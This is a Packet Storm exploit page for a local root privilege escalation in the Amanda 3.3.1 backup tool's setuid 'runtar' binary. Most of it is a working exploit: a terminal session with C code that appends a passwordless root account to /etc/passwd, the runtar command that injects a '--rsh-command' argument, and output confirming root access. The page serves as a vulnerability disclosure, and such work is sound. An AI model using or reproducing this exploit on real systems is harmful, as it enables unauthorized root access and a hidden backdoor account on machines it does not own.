what you don't know can hurt you

Amanda 3.3.1 Local Root Privilege Escalation

Amanda 3.3.1 Local Root Privilege Escalation
Posted Jan 11, 2016
Authored by Hacker Fantastic

Amanda version 3.3.1 suffers from a local root privilege escalation vulnerability via the setuid runtar binary.

tags | exploit, local, root
MD5 | daba55a5ef8673dfac8b757e463a496d

Amanda 3.3.1 Local Root Privilege Escalation

Change Mirror Download
AMANDA, the Advanced Maryland Automatic Network Disk Archiver, is a backup 
solution that allows the IT administrator to set up a single master backup
server to back up multiple hosts over network to tape drives/changers or
disks or optical media. Amanda uses native utilities and formats (e.g. dump
and/or GNU tar) and can back up a large number of servers and workstations
running multiple versions of Linux or Unix.

A user with backup privs can trivially compromise a client installation.
The "runtar" setuid root binary does not check for additional arguments
supplied after --create, allowing users to manipulate commands and perform
command injection as root. Tested against Amanda 3.3.1.

An example is shown below:

$ uname -a
Linux raspberrypi 3.10.25 #1 Sat Dec 28 20:50:23 EST 2013 armv6l GNU/Linux
$ ls -al /usr/lib/amanda/runtar
-rwsr-xr-- 1 root backup 9776 Jul 29 2012 /usr/lib/amanda/runtar
$ id
uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
$ cat /tmp/x.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(){
setreuid(0,0);
setregid(0,0);
system("echo r00t::0:0::/:/bin/sh >> /etc/passwd");
exit(0);
}
$ su - r00t
No passwd entry for user 'r00t'
$ gcc x.c -o x
$ /usr/lib/amanda/runtar NOCONFIG tar --create --rsh-command=/tmp/x -vf localhost:/tmp/lol /etc/passwd
tar: localhost\:/tmp/lol: Cannot open: Input/output error
tar: Error is not recoverable: exiting now
$ su - r00t
# id
uid=0(root) gid=0(root) groups=0(root)

-- Hacker Fantastic

Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    13 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close